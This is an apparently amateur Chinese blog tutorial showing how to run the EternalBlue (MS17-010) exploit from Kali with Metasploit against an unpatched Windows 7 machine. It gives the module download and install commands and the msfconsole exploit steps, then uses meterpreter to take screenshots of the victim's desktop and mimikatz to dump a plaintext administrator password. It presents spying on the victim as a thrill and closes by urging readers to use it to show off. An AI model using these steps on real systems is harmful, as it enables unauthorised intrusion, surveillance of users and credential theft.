勒索病毒 (远程执行漏洞 演示)

先决条件 

准备好弹药(MS17-010 SMB下载)

kali系统

 一台刚装好的win7

 

在kali的命令行中输入一下命令

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到/usr/share/metasploit-framework/modules/exploits/windows/smb

cd    Eternalblue-Doublepulsar-Metasploit/

Cp -r deps/eternalblue_doublepulsar.rb/usr/share/metasploit-framework/modules/exploits/windows/smb

 

 之后我们进入正题!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

首先打开我们的msf框架

 勒索病毒 (远程执行漏洞 演示)_第1张图片

 

 

首先看一下我们有哪些攻击的漏洞(这些需要之前去网上下载)

其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中近期更新的针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。

 勒索病毒 (远程执行漏洞 演示)_第2张图片

 

 

我们利用的是MS17-010 SMB RCE Detection

msf > use exploit/windows/smb/ms17_010_eternalblue

 勒索病毒 (远程执行漏洞 演示)_第3张图片

 

 

首先我们先看一下这个模块需要我们添加什么样的参数

RHOST  这里我们需要添加受害者的主机

剩下的不用填

 勒索病毒 (远程执行漏洞 演示)_第4张图片

 勒索病毒 (远程执行漏洞 演示)_第5张图片

 

 

 

msf exploit(windows/smb/ms17_010_eternalblue) > exploit

一般第一次攻击都不好使,没关系在试一遍就好了。

 

防火墙即使开了也防不住

 勒索病毒 (远程执行漏洞 演示)_第6张图片

 

 

 

成功拿下之后可以查一下当前的用户级别

勒索病毒 (远程执行漏洞 演示)_第7张图片

System 很高哦!!!   (科普一下 system > administrator > user* 大神绕过)

 勒索病毒 (远程执行漏洞 演示)_第8张图片

 

试一试 创建 删除 等命令(在C盘下)

 勒索病毒 (远程执行漏洞 演示)_第9张图片

勒索病毒 (远程执行漏洞 演示)_第10张图片

勒索病毒 (远程执行漏洞 演示)_第11张图片

 

 

尝试一些可怕的命令比如 截张图看看他在干什么!!!

(1)桌面抓图 

Exit退回到meterpreter

1. meterpreter > screenshot

 

文件保存到  /root/FsdXhovL.jpeg  (他在看什么???)

 

 

 

获取系统管理密码

meterpreter >load mimikatz    //载入模块

meterpreter >mimikatz

 勒索病毒 (远程执行漏洞 演示)_第12张图片

用户名 q 密码 123.com

远程连接一下试试

是不是很强悍!!!

 

 

 

会了这些是不是感觉逼格提升了一大部分!!!!!

   

然而现在并不好使了 这个是勒索病毒的时候流行的 现在几乎所有的电脑都打了补丁了只能黑一些刚做完系统的啥都没装的机子  emmm…………   拿去装逼吧!!! 

你可能感兴趣的:(最菜白帽子之路的笔记)